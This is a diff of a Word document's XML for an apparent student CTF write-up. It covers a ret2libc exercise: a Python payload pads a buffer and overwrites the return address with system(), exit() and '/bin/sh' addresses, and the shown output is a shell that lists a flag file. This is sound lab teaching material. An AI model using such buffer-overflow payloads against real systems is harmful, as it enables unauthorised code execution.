+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> by program </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>randomly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>Solution.sh script:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D911D42" wp14:editId="6A60C3EB">
+            <wp:extent cx="5399405" cy="4640580"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="551315997" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="551315997" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5399405" cy="4640580"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Ret2Libc</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Nadpis2"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Theory</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Picture"/>
         <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Menlo" w:ascii="Menlo" w:hAnsi="Menlo"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
           <w:color w:val="000000"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
           <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
         </w:rPr>
-        <w:t>Lorem Ipsum.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>Lorem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
+        </w:rPr>
+        <w:t>Ipsum</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Practice</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:hanging="0"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
         <w:t>On the first task, the script solution.sh is the following:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>python3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>-c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>import sys</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>from struct import pack # this makes easier to write addresses on little indian format</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload = b"A" * 112 # padding</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e15360) # system func address. obtained with print system (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e07ec0) # exit func address. obtained with print exit</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7f60363) # /bin/sh string address. obtained with grep "/bin/sh" (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>sys.stdout.buffer.write(payload)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">The addresses were obtained during a gdb session with the ret2libc executable. In this session, and while putting a breakpoint on main and running the executable, we can use the command “print func” to print the addresses of the functions system() and exit(), and with grep we can search string on the environment. In this case, we can use grep “/bin/sh” to find the address of that string and append that to the payload so we can load the bash. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>With the padding we can fill the buffer on the vuln function, and after that, and with the extra padding bytes, we can replace the return function to system() function. This function is capable of executing any bash command. In this case, we also overwrite the bytes after exit() function with a pointer to a bash terminal. With this overlapping, when we execute ret2libc with the script we can access directly to a bash terminal and read the flag: NEVER_RETURN_TO_STANDARD_LIFE.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:pStyle w:val="Zkladntext"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The addresses were obtained during a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> session with the ret2libc executable. In this session, and while putting a breakpoint on main and running the executable, we can use the command “print </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>func</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">” to print the addresses of the functions </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>system(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>exit(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>), and with grep we can search string on the environment. In this case, we can use grep “/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">” to find the address of that string and append that to the payload so we can load the bash. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Zkladntext"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">With the padding we can fill the buffer on the vuln function, and after that, and with the extra padding bytes, we can replace the return function to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>system(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) function. This function </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>is capable of executing</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> any bash command. In this case, we also overwrite the bytes after </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>exit(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) function with a pointer to a bash terminal. With this overlapping, when we execute </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>ret2libc with the script we can access directly to a bash terminal and read the flag: NEVER_RETURN_TO_STANDARD_LIFE.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Zkladntext"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:rPr>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>./ret2libc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i w:val="false"/>
           <w:color w:val="008000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>$(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>./solution.sh</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i w:val="false"/>
           <w:color w:val="008000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:pStyle w:val="Zkladntext"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:rPr>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>bash-5.0$</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>ls</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:pStyle w:val="Zkladntext"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>ret2libc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>ret2libc.c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>solution.sh</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>solution_grade.sh</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>t0p_s3cr3t</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:pStyle w:val="Zkladntext"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>bash-5.0$</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
